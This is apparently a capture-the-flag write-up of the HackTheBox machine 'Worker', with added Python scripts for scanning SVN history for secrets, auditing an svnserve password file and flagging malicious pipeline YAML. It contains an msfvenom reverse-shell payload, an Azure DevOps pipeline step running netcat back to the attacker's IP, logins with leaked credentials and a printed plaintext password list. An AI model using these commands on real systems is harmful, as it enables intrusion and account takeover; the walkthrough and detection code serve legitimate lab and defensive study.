Worker

Nmap

nmap -sC -sV -p- -T4 -Pn 10.10.10.203            
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-24 19:09 BST
Nmap scan report for 10.10.10.203
Host is up, received user-set (0.036s latency).
Not shown: 65532 filtered ports
Reason: 65532 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE  REASON          VERSION
80/tcp   open  http     syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3690/tcp open  svnserve syn-ack ttl 127 Subversion
5985/tcp open  http     syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

User

On port 80 we see the default IIS page.
Port 3690 exposes an SVN repository (something similar to Git), which we can enumerate.

svn info svn://worker.htb

Ścieżka: .
URL: svn://worker.htb
Relative URL: ^/
Katalog główny repozytorium: svn://worker.htb
UUID repozytorium: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Wersja: 5
Rodzaj obiektu: katalog
Autor ostatniej zmiany: nathen
Ostatnio zmieniona wersja: 5
Data ostatniej zmiany: 2020-06-20 14:52:00 +0100 (sob)

svn list svn://worker.htb

dimension.worker.htb/
moved.txt

We find a folder and a file; we can export them and see what's inside.

A    svn
A    svn/dimension.worker.htb
A    svn/dimension.worker.htb/LICENSE.txt
A    svn/dimension.worker.htb/README.txt
A    svn/dimension.worker.htb/assets
A    svn/dimension.worker.htb/assets/css
A    svn/dimension.worker.htb/assets/css/fontawesome-all.min.css
A    svn/dimension.worker.htb/assets/css/main.css
A    svn/dimension.worker.htb/assets/css/noscript.css
A    svn/dimension.worker.htb/assets/js
A    svn/dimension.worker.htb/assets/js/breakpoints.min.js
A    svn/dimension.worker.htb/assets/js/browser.min.js
A    svn/dimension.worker.htb/assets/js/jquery.min.js
A    svn/dimension.worker.htb/assets/js/main.js
A    svn/dimension.worker.htb/assets/js/util.js
A    svn/dimension.worker.htb/assets/sass
A    svn/dimension.worker.htb/assets/sass/base
A    svn/dimension.worker.htb/assets/sass/base/_page.scss
A    svn/dimension.worker.htb/assets/sass/base/_reset.scss
A    svn/dimension.worker.htb/assets/sass/base/_typography.scss
A    svn/dimension.worker.htb/assets/sass/components
A    svn/dimension.worker.htb/assets/sass/components/_actions.scss
A    svn/dimension.worker.htb/assets/sass/components/_box.scss
A    svn/dimension.worker.htb/assets/sass/components/_button.scss
A    svn/dimension.worker.htb/assets/sass/components/_form.scss
A    svn/dimension.worker.htb/assets/sass/components/_icon.scss
A    svn/dimension.worker.htb/assets/sass/components/_icons.scss
A    svn/dimension.worker.htb/assets/sass/components/_image.scss
A    svn/dimension.worker.htb/assets/sass/components/_list.scss
A    svn/dimension.worker.htb/assets/sass/components/_table.scss
A    svn/dimension.worker.htb/assets/sass/layout
A    svn/dimension.worker.htb/assets/sass/layout/_bg.scss
A    svn/dimension.worker.htb/assets/sass/layout/_footer.scss
A    svn/dimension.worker.htb/assets/sass/layout/_header.scss
A    svn/dimension.worker.htb/assets/sass/layout/_main.scss
A    svn/dimension.worker.htb/assets/sass/layout/_wrapper.scss
A    svn/dimension.worker.htb/assets/sass/libs
A    svn/dimension.worker.htb/assets/sass/libs/_breakpoints.scss
A    svn/dimension.worker.htb/assets/sass/libs/_functions.scss
A    svn/dimension.worker.htb/assets/sass/libs/_mixins.scss
A    svn/dimension.worker.htb/assets/sass/libs/_vars.scss
A    svn/dimension.worker.htb/assets/sass/libs/_vendor.scss
A    svn/dimension.worker.htb/assets/sass/main.scss
A    svn/dimension.worker.htb/assets/sass/noscript.scss
A    svn/dimension.worker.htb/assets/webfonts
A    svn/dimension.worker.htb/assets/webfonts/fa-brands-400.eot
A    svn/dimension.worker.htb/assets/webfonts/fa-brands-400.svg
A    svn/dimension.worker.htb/assets/webfonts/fa-brands-400.ttf
A    svn/dimension.worker.htb/assets/webfonts/fa-brands-400.woff
A    svn/dimension.worker.htb/assets/webfonts/fa-brands-400.woff2
A    svn/dimension.worker.htb/assets/webfonts/fa-regular-400.eot
A    svn/dimension.worker.htb/assets/webfonts/fa-regular-400.svg
A    svn/dimension.worker.htb/assets/webfonts/fa-regular-400.ttf
A    svn/dimension.worker.htb/assets/webfonts/fa-regular-400.woff
A    svn/dimension.worker.htb/assets/webfonts/fa-regular-400.woff2
A    svn/dimension.worker.htb/assets/webfonts/fa-solid-900.eot
A    svn/dimension.worker.htb/assets/webfonts/fa-solid-900.svg
A    svn/dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
A    svn/dimension.worker.htb/assets/webfonts/fa-solid-900.woff
A    svn/dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
A    svn/dimension.worker.htb/images
A    svn/dimension.worker.htb/images/bg.jpg
A    svn/dimension.worker.htb/images/overlay.png
A    svn/dimension.worker.htb/images/pic01.jpg
A    svn/dimension.worker.htb/images/pic02.jpg
A    svn/dimension.worker.htb/images/pic03.jpg
A    svn/dimension.worker.htb/index.html
A    svn/moved.txt
Wyeksportowano wersję 5.

The moved.txt file reveals another subdomain:

cat moved.txt
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb

// The Worker team :)

We add the “devops” and “dimension” subdomains to /etc/hosts.
Dimension is a rabbit hole… Devops, however, prompts for Basic Auth, so we need credentials.
We continue enumerating the repository.

svn log svn://worker.htb  

------------------------------------------------------------------------
r5 | nathen | 2020-06-20 14:52:00 +0100 (sob) | 1 linia

Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 14:50:20 +0100 (sob) | 1 linia

Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 14:46:19 +0100 (sob) | 1 linia

-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 14:45:16 +0100 (sob) | 1 linia

Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 14:43:43 +0100 (sob) | 1 linia

First version
------------------------------------------------------------------------

The log mentions a deployment script; it is worth checking it out and seeing what's inside.

svn checkout -r2  svn://worker.htb
A    deploy.ps1
Pobrano wersję 2.
cat deploy.ps1 
$user = "nathen" 
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")

We find login credentials and use them to try to log in to the web server.

"nathen" : "wendel98"
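The credential above only exists in r2 (the script was removed again in r3), which is exactly why a scan of the working copy alone misses it. As an added defensive example, not part of the original writeup or of the Worker box: a small Python scanner that walks every revision of a repository for credential-like literals and reports whether the secret is still present at HEAD. The rule names, the SAMPLE_HISTORY layout and the load_svn_history helper are my own; the offline demo embeds the deploy.ps1 contents shown above as constructed sample data.

```python
import re
import subprocess
from typing import Dict, List, Tuple

# (rule name, regex); group 1 captures the candidate secret. Rule names are my own.
SECRET_RULES: List[Tuple[str, re.Pattern]] = [
    # $plain = "wendel98"   (PowerShell variable holding a literal password)
    ("ps-plaintext-variable",
     re.compile(r'\$(?:plain|pass(?:word)?|pwd|secret)\w*\s*=\s*["\']([^"\']+)["\']', re.I)),
    # password=..., passwd: ..., pwd = ...  (config files, shell scripts); the value class
    # excludes "$" and "(" so a reference like  $pwd = ($plain | ...)  is not reported
    ("generic-password-kv",
     re.compile(r'\b(?:password|passwd|pwd)\s*[:=]\s*["\']?([A-Za-z0-9!@#%^&*._-]{4,})', re.I)),
    # New-Object ... PSCredential "user", "literal"
    ("pscredential-literal",
     re.compile(r'PSCredential\s+["\']?\w+["\']?\s*,\s*["\']([^"\']+)["\']', re.I)),
]


def find_secrets(text: str) -> List[Tuple[str, int, str]]:
    """Return (rule, line_number, secret) for every credential-like literal in text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, rx in SECRET_RULES:
            for m in rx.finditer(line):
                hits.append((name, lineno, m.group(1)))
    return hits


def scan_history(history: Dict[int, Dict[str, str]]) -> List[dict]:
    """history: revision -> {path: content}. Every revision is scanned, so a secret that was
    committed once and later deleted from HEAD is still reported (still_in_head=False)."""
    findings = []
    for rev in sorted(history):
        for path, content in sorted(history[rev].items()):
            for rule, lineno, secret in find_secrets(content):
                findings.append({"rev": rev, "path": path, "line": lineno,
                                 "rule": rule, "secret": secret})
    head = max(history) if history else None
    head_secrets = {f["secret"] for f in findings if f["rev"] == head}
    for f in findings:
        f["still_in_head"] = f["secret"] in head_secrets
    return findings


def load_svn_history(url: str) -> Dict[int, Dict[str, str]]:
    """Pull every revision through the svn CLI (needs network; not used by the offline demo)."""
    log = subprocess.run(["svn", "log", "-q", url], capture_output=True, text=True, check=True).stdout
    history: Dict[int, Dict[str, str]] = {}
    for rev in (int(m.group(1)) for m in re.finditer(r"^r(\d+) \|", log, re.M)):
        listing = subprocess.run(["svn", "list", "-R", "-r", str(rev), url],
                                 capture_output=True, text=True, check=True).stdout
        files = {}
        for path in listing.splitlines():
            if path and not path.endswith("/"):
                files[path] = subprocess.run(["svn", "cat", "-r", str(rev), f"{url}/{path}"],
                                             capture_output=True, text=True, check=True).stdout
        history[rev] = files
    return history


# Constructed sample history: deploy.ps1 (contents as recovered above) exists only in r2.
DEPLOY_PS1 = ('$user = "nathen"\n'
              '$plain = "wendel98"\n'
              '$pwd = ($plain | ConvertTo-SecureString)\n'
              '$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd\n')
INDEX_HTML = "<html><body>First version</body></html>\n"
SAMPLE_HISTORY = {
    1: {"index.html": INDEX_HTML},
    2: {"index.html": INDEX_HTML, "deploy.ps1": DEPLOY_PS1},
    3: {"index.html": INDEX_HTML},   # script removed again, credential not rotated
}

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"r{f['rev']} {f['path']}:{f['line']} [{f['rule']}] still_in_head={f['still_in_head']}")
```

The point of the still_in_head flag is the one this box illustrates: deleting a file from the repository does not revoke the credential it contained, so any hit with still_in_head=False is a rotation task, not a false positive.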

We see an “Azure DevOps” page with the SmartHotel360 project.
In the Repos tab we can create our own branch and upload files.
To start, we generate a reverse shell.

msfvenom -f aspx -p windows/x64/shell_reverse_tcp LHOST=10.10.14.66 LPORT=9090 -o rev.aspx

msfconsole
handler -p windows/x64/shell_reverse_tcp -H 10.10.14.66 -P 9090
We go to Branches and create a new branch,
then upload our rev.aspx file.

Then we create a Pull Request and merge it.
I forgot to add that we do all of this in the “Spectral” branch.

Finally we open:
http://spectral.worker.htb/rev.aspx
and we have a reverse shell.

We upload winPEAS to the box and check what's interesting there.
At first glance we see an additional share.

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] CURRENT SHARES <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

Share name   Resource                        Remark

-------------------------------------------------------------------------------
C$           C:\                             Default share                     
IPC$                                         Remote IPC                        
W$           W:\                             Default share                     
ADMIN$       C:\Windows                      Remote Admin                      
The command completed successfully.
    Directory: W:\


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       2020-06-16     18:59                agents                                                                
d-----       2020-03-28     14:57                AzureDevOpsData                                                       
d-----       2020-04-03     11:31                sites                                                                 
d-----       2020-06-20     16:04                svnrepos  

We find a file with usernames and passwords.

PS W:\svnrepos\www\conf> cat passwd
cat passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
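The svnserve passwd format stores every password in clear text by design, so the only real protections are file permissions and password hygiene, and this file was sitting on a readable share. As an added example, not from the original writeup: a Python audit for such a file that parses the [users] section (keeping duplicates instead of silently overwriting them, which configparser would do), then reports duplicate usernames, passwords shared between accounts and short passwords. The function names, the 12-character threshold and the trimmed SAMPLE_PASSWD are my own; the sample entries are a constructed subset of the listing above.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple


def parse_svnserve_passwd(text: str) -> List[Tuple[str, str]]:
    """Return (user, password) pairs from the [users] section, in file order, duplicates kept."""
    entries = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):          # svnserve uses '#' / '###' comments
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            section = m.group(1).strip().lower()
            continue
        if section != "users" or "=" not in line:
            continue
        user, _, password = line.partition("=")
        entries.append((user.strip(), password.strip()))
    return entries


def audit_passwd(text: str, min_length: int = 12) -> Dict[str, object]:
    """Summarise the weaknesses an administrator should act on before anything else."""
    entries = parse_svnserve_passwd(text)
    by_user = defaultdict(list)       # user -> [passwords]  (more than one = duplicate entry)
    by_password = defaultdict(list)   # password -> [users]  (more than one = reuse)
    for user, password in entries:
        by_user[user].append(password)
        by_password[password].append(user)
    return {
        "plaintext_accounts": len(entries),
        "duplicate_users": sorted(u for u, pws in by_user.items() if len(pws) > 1),
        "reused_passwords": sorted(sorted(users) for users in by_password.values() if len(users) > 1),
        "short_passwords": sorted({u for u, p in entries if len(p) < min_length}),
    }


# Constructed sample: header comments plus a subset of the entries found in W:\svnrepos\www\conf\passwd.
SAMPLE_PASSWD = """\
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
robish = onesare
robisl = wolves11
ronkay = onesare
reeinc = iagree
"""

if __name__ == "__main__":
    for key, value in audit_passwd(SAMPLE_PASSWD).items():
        print(f"{key}: {value}")
```

On the full file the reused_passwords list is the most useful output: robish and ronkay share “onesare” (and “nathen = wendel98” is the same credential that was already leaked through the SVN history), so one compromised account immediately gives a second one. The longer-term fix is not a stronger passwd file but moving authentication off svnserve's plaintext store (SASL, or Subversion behind an HTTPS front end with hashed credentials) and restricting who can read the conf directory.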

In “C:\Users” we see there is a robisl user, so we try to get into that account.

evil-winrm.rb -i 10.10.10.203 -u robisl -p wolves11
*Evil-WinRM* PS C:\Users\robisl\Desktop> cat user.txt
6556b48734963***779579b8b5a60f

Administrator

There is nothing else of interest on the box itself. We can, however, log in to Azure DevOps with the credentials we found earlier.
This time we see a different project, “PartsUnlimited”.

This time we will try to create a new Pipeline.
The first thing we do is upload netcat.

*Evil-WinRM* PS C:\Users\robisl\Documents> upload nc64.exe
We create a new Pipeline.
We choose Azure Repos Git, then PartsUnlimited.
We choose Starter Pipeline.
We delete the single pool line and then change the script line:
# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- master

steps:
- script: powershell.exe -c "C:\Users\robisl\Documents\nc64.exe 10.10.14.66 9092 -e powershell.exe"
  displayName: 'Run a one-line script'

- script: |
    echo Add other tasks to build, test, and deploy your project.
    echo See https://aka.ms/yaml
  displayName: 'Run a multi-line script'
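What makes this step dangerous is the combination: the pool line was removed, so the job lands on a self-hosted agent (which on this box runs as SYSTEM), and the script step is an arbitrary command. As an added example from the reviewing side, not part of the original writeup: a Python check for pipeline YAML that pulls out every inline-command step (script, powershell, pwsh, bash; both the one-line and the `|` block form) without needing a YAML library, flags command text a build script has no business containing, and warns when no hosted vmImage is set. The rule names and the SUSPICIOUS_RULES patterns are my own; SAMPLE_PIPELINE is a copy of the YAML above.

```python
import re
from typing import Dict, List

# Step keys whose value is an inline command executed on the agent.
STEP_RX = re.compile(r"^(\s*)-\s*(script|powershell|pwsh|bash):\s*(.*)$")

# Patterns a reviewer would not expect in a build script (rule names are my own).
SUSPICIOUS_RULES = [
    ("reverse-shell-tool", re.compile(r"\b(?:nc|nc64|ncat|netcat|socat)(?:\.exe)?\b", re.I)),
    ("shell-bound-to-socket", re.compile(r"\s-e\s+(?:powershell|cmd|/bin/(?:ba)?sh)", re.I)),
    ("raw-ip-and-port", re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\s+\d{2,5}\b")),
    ("encoded-powershell", re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
]


def _indent(line: str) -> int:
    return len(line) - len(line.lstrip(" "))


def extract_scripts(yaml_text: str) -> List[Dict]:
    """Return [{'line': n, 'key': 'script', 'body': '...'}] for each inline-command step.
    Line-based on purpose: handles `- script: cmd` and the `- script: |` block form."""
    lines = yaml_text.splitlines()
    steps, i = [], 0
    while i < len(lines):
        m = STEP_RX.match(lines[i])
        if not m:
            i += 1
            continue
        dash_indent, key, rest = len(m.group(1)), m.group(2), m.group(3).strip()
        if rest in ("|", "|-", ">", ">-"):
            # Block scalar: body lines sit deeper than the step's sibling keys (dash + 2).
            body, j = [], i + 1
            while j < len(lines) and (not lines[j].strip() or _indent(lines[j]) > dash_indent + 2):
                body.append(lines[j].strip())
                j += 1
            steps.append({"line": i + 1, "key": key, "body": "\n".join(body).strip()})
            i = j
        else:
            steps.append({"line": i + 1, "key": key, "body": rest.strip("\"'")})
            i += 1
    return steps


def audit_pipeline(yaml_text: str) -> List[Dict]:
    """One finding per (step, rule) hit, plus a pool warning when no hosted image is pinned."""
    findings = []
    for step in extract_scripts(yaml_text):
        for rule, rx in SUSPICIOUS_RULES:
            m = rx.search(step["body"])
            if m:
                findings.append({"line": step["line"], "rule": rule, "evidence": m.group(0).strip()})
    # Without pool.vmImage the job runs on the project's default (often self-hosted) agent pool,
    # where every step executes with whatever rights the agent service account holds.
    if not re.search(r"^\s*vmImage:", yaml_text, re.M):
        findings.append({"line": None, "rule": "no-hosted-pool", "evidence": "pool.vmImage not set"})
    return findings


# Copy of the modified starter pipeline shown above (raw string: the Windows path contains backslashes).
SAMPLE_PIPELINE = r"""# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- master

steps:
- script: powershell.exe -c "C:\Users\robisl\Documents\nc64.exe 10.10.14.66 9092 -e powershell.exe"
  displayName: 'Run a one-line script'

- script: |
    echo Add other tasks to build, test, and deploy your project.
    echo See https://aka.ms/yaml
  displayName: 'Run a multi-line script'
"""

if __name__ == "__main__":
    for f in audit_pipeline(SAMPLE_PIPELINE):
        print(f"line {f['line']}: {f['rule']} ({f['evidence']})")
```

Run as a pre-merge check on every pipeline YAML change, this reports the script step at line 10 three times (tool name, the -e shell binding and the raw IP/port pair) and the missing vmImage once; the second, untouched starter step produces nothing. The pool warning is the one worth acting on at the organisation level: if self-hosted agents must exist, they should run as a dedicated low-privilege service account, not as SYSTEM, and pipeline edits on such pools should require an approval.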

On the local machine we already have a listener set up.

PS W:\agents\agent11\_work\10\s> whoami
nt authority\system
PS C:\users\administrator\Desktop> cat root.txt

950b46f465b278***438cc76658c
